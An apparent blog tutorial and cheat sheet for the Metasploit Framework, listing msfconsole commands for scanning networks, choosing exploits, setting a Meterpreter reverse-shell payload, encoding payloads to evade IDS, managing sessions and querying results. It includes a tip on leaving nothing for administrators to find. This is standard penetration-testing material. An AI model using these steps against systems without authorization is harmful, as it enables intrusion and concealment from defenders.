December 19, 2015

Metasploit Framework

The Metasploit Framework is not something that runs out and exploits all available targets automatically.  This is not a script kiddie tool for aiming and pulling a trigger.  This is a serious toolbox full of modules, exploits, and payload templates.  You need to know how to put it all together to get anything meaningful out of it.

  1. Find targets.
  2. Find vulnerabilities.
  3. Exploit the vulnerabilities.
  4. Drop a payload.
  5. Hopefully run some shell code with the payload.
  6. Own the box.
  7. Repeat.

Metasploit Framework Terms

Before getting started with the Metasploit Framework (MSF), I need to explain a few things from Metasploit’s perspective:

  • An Exploit allows an attacker to take advantage of a flaw (also called a bug) within the target system’s operating system, a software application, a running service, etc. that results in a favorable outcome for the attacker.  In other words, it allows you to bypass whatever security protects the system under normal operation.
  • A Payload is the code that we want the compromised system to execute.  A handy payload is a reverse shell.
  • Shellcode is a set of instructions, typically written in assembly language, which are packaged up in a payload.  Commonly what happens is a command shell, reverse shell, or Meterpreter shell is returned.
  • A Module is a piece of code the Metasploit Framework can load.  The module types are exploits, auxiliary (utilities like scanners), and post (post-exploitation).  Modules are interchangeable, which is what makes the framework powerful.
  • A Listener is a service on the attacker’s machine that waits for a compromised target to call back.  Typically you need this to get through firewalls: if the target connects out from a private IP address behind the organization’s firewall to the public Internet, the target’s firewall will typically allow it.

Interfaces to the Metasploit Framework

You can interface with the Metasploit Framework (MSF) in different ways:

  • The Console (msfconsole) – A standalone application that provides user-friendly access to all of the options and settings, and lets you do everything: launch exploits, load modules, enumerate targets, create listeners, or run mass exploitation with a fire-and-wait nuclear option.
  • Command line (msfcli) – Runs directly from the Linux or Windows command line.  Use this to script the framework into other tools.
  • Armitage GUI (armitage) – Full featured graphical user interface.  For details check out our Armitage page.


Using msfconsole

  • Before you use the msfconsole, you may need to start the database:
    • root@kali:~# service postgresql start
  • Start up the MSF Console:
    • root@kali:~# msfconsole
    • You should see one of the many Metasploit banners, plus the version and the number of exploits, auxiliary, post, payloads, encoders, and nops.
    • The prompt will then change to ‘msf >’
  • Check to see if the PostgreSQL database is connected to MSF:
    • msf > db_status
  • To run nmap and have the results go to the database use db_nmap:
    • msf > db_nmap -sS -Pn -A 192.168.1.0/24
  • Check the results in the database with:
    • msf > hosts
    • msf > services
  • Show all exploits in the framework.
    • msf > show exploits
  • Show all payloads in the framework.
    • msf > show payloads
  • Show all the auxiliary modules in the framework.
    • msf > show auxiliary
  • Search for exploits or modules in the framework.
    • msf > search ____ <– whatever…
    • msf > search cisco
    • msf > search linksys
    • msf > search windows
    • msf > search lenovo
    • msf > search ms15
  • To see what the exploit or module does use the info command followed by the exploit path and name.  It’s best to search then copy and paste.
    • msf > info ____ <–name of an exploit, module, etc…
    • msf > info exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
    • msf > info exploit/windows/local/ms14_009_ie_dfsvc
    • msf > info scanner/portscan/syn
  • When you decide on which module or exploit to fire at the target, use it.
    • msf > use scanner/portscan/syn
    • msf auxiliary(syn) > show options
    • msf auxiliary(syn) > set rhosts 192.168.0.0/12
    • msf auxiliary(syn) > set ports 21-1434,3389
    • msf auxiliary(syn) > run
  • Most modules and exploits will require you to at least provide the RHOST (remote host, a.k.a. the target); you do this with the set command.  Rather than setting it every time you go into a new module or exploit, you can set it globally with setg.
    • msf exploit(msadc) > set rhost 192.168.0.0/24
    • msf > setg rhost 192.168.0.0/24
  • You can check to see whether the target is vulnerable before actually launching an active attack.
    • msf exploit(msadc) > check
  • To see the options set for a module or exploit, use show options and show advanced.
    • msf auxiliary(syn) > show options
    • msf auxiliary(syn) > show advanced
  • Some of the exploits are aimed at very specific operating systems and patch levels.  By default the target is set to automatic (Id = 0), but automatic doesn’t work well with every exploit; some work better if you tell them specifically which version and patch level to use (via the id number).  You will also want to set a payload for the exploit so you can take action against the target once it has been successfully exploited.
    • msf exploit(ms08_067_netapi) > show targets
    • msf exploit(ms08_067_netapi) > set target 3
    • msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
  • Now when it comes to exploiting the target, you can use exploit and/or run, they seem to do the same thing.
    • msf exploit(msadc) > exploit
    • msf exploit(msadc) > run
  • exploit has a few options:
    • msf exploit(msadc) > exploit -h <– shows help for the exploit command.
    • msf exploit(msadc) > exploit -j <– runs the exploit as a job in the background.
    • msf exploit(msadc) > exploit -z <– don’t interact with the session after successful exploitation.
    • msf exploit(msadc) > exploit -e some_encoder_name <– specify the payload encoder to evade IDS.
  • After you gain a command line interface on one or many targets, you interact with them using the sessions command.
  • To list sessions available to interact with.
    • msf > sessions -l
  • To list all sessions with the verbose fields as well, such as which exploit was used to start the session.
    • msf > sessions -l -v
  • To execute a command on all live Meterpreter sessions.
    • msf > sessions -c _____ <– the name of some command.
  • To run a Meterpreter script on all Meterpreter live sessions.
    • msf > sessions -s _____ <– the name of the script.
  • To upgrade a normal Win32 shell to a Meterpreter console.
    • msf > sessions -u _____ <– the sessionID.
  • It’s always best when you are finished to kill all live sessions and leave nothing open for the system and network administrators to find.
    • msf > sessions -k

Metasploit Utils

  • msfpayload – Generates shellcode in multiple output formats including C, JavaScript, Ruby, and VBA (Visual Basic for Applications).
  • msfencode – Use this after msfpayload; it encodes the payload so the code avoids bad characters and IDS/antivirus signature detection.
  • nasm_shell.rb – An interactive assembler shell: type assembly instructions and it prints their opcode bytes, which is handy when reading or writing shellcode.


Updating Metasploit on Kali Linux

If you are having an issue with msfupdate always saying there are no updates, edit the /etc/apt/sources.list file and check the repositories it needs to function.  Make sure the top (uncommented) line exists in the file.  The others are old now.

  • deb http://http.kali.org/kali kali-rolling main contrib non-free
  • # deb http://http.kali.org/kali sana main non-free contrib
  • # deb http://security.kali.org/kali-security sana/updates main contrib non-free
  • # deb http://old.kali.org/kali moto main non-free contrib

If it still isn’t working check kali.org for the latest repo changes.

Workspaces

If you will be using MSF for multiple clients or environments (a.k.a. Consultants) then you will need to separate them by Workspace.  When you start msfconsole for the first time, you will be in the default workspace.

  • msf > workspace to list all the workspaces.
  • msf > workspace -v to list the workspaces with counts of hosts, services, vulns, creds, loots, and notes.
  • msf > workspace -a MyNewWorkspace – to ADD a new workspace.
  • msf > workspace -r oldWorkspaceName newWS – to RENAME a workspace.
  • msf > workspace -d MyOldAssWorkspace – to DELETE a workspace.
  • msf > workspace -D delete ALL workspaces (a.k.a. nuke from high orbit).
  • msf > workspace -h to get help.

Querying the MSF Postgres Database

Once you collect the data, you will want to dig down and find the interesting things.

Query the Services

  • To show which services are open
    • msf > services -u
  • To show all available columns (note that the address will always be shown on the left side)
    • msf > services -c created_at,info,name,port,proto,state,updated_at
  • To show certain columns AND for a single host or subnet
    • msf > services -c proto,port,state,name 192.168.4.77
    • msf > services -c proto,port,state,name 192.168.4.0/24
  • To drill down to find specific ports, such as web servers
    • msf > services -p 80,443
  • To sort the results by the column number (e.g. the port is the 2nd column)
    • msf > services -O 2
  • To export the results to a CSV file.
    • msf > services -p 80,433 -O 2 -o /root/somedir/somefile.csv
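The same port, host/subnet, state and sort filters applied offline to a CSV produced by services -o, as an added example that is not part of the original page or of the Metasploit project; it assumes the export header uses msfconsole's default column order (host, port, proto, name, state, info), and the sample rows are constructed.

```python
import csv
import io
import ipaddress

# Constructed sample of a `services -o somefile.csv` export. The assumed
# header is msfconsole's default column order (host first), which makes
# port the 2nd column as in the page's `services -O 2` example.
SAMPLE_CSV = """host,port,proto,name,state,info
192.168.4.77,22,tcp,ssh,open,OpenSSH 7.2p2
192.168.4.77,80,tcp,http,open,Apache httpd 2.4.18
192.168.4.80,443,tcp,https,open,nginx 1.10.3
192.168.4.80,3389,tcp,ms-wbt-server,closed,
192.168.4.91,80,tcp,http,open,Microsoft IIS httpd 7.5
10.0.0.5,8080,tcp,http-proxy,open,
"""

def parse_services(text):
    """Read the CSV export into a list of dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))

def parse_port_spec(spec):
    """Expand a port spec such as '21-1434,3389' into a set of ints."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.update(range(int(lo), int(hi) + 1))
        elif part:
            ports.add(int(part))
    return ports

def filter_services(rows, ports=None, network=None, state=None, sort_col=None):
    """Mirror `services -p PORTS [-u] -O N HOST_OR_CIDR` over the export.

    ports:    set of ints (see parse_port_spec); None keeps all ports
    network:  a single address or CIDR string; None keeps all hosts
    state:    e.g. 'open' (what -u selects); None keeps all states
    sort_col: 1-based column number to sort on; digit columns sort numerically
    """
    net = ipaddress.ip_network(network, strict=False) if network else None
    out = [r for r in rows
           if (ports is None or int(r["port"]) in ports)
           and (net is None or ipaddress.ip_address(r["host"]) in net)
           and (state is None or r["state"] == state)]
    if sort_col is not None and out:
        key = list(out[0].keys())[sort_col - 1]
        out.sort(key=lambda r: (0, int(r[key])) if r[key].isdigit() else (1, r[key]))
    return out
```

Point parse_services at the contents of your own export file to triage a real scan; the filters compose the same way the msfconsole switches do.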

Query for Exploits

  • To show exploits matching the year of the CVE
    • search cve:2017
  • To show exploits matching text in the name
    • search name:struts
  • To show exploits for a particular platform
    • search platform:apple

Query for Auxiliary things

  • To show the scanners
    • search type:auxiliary name:scanner

Source Code

Go to Github for the source code –> https://github.com/rapid7/metasploit-framework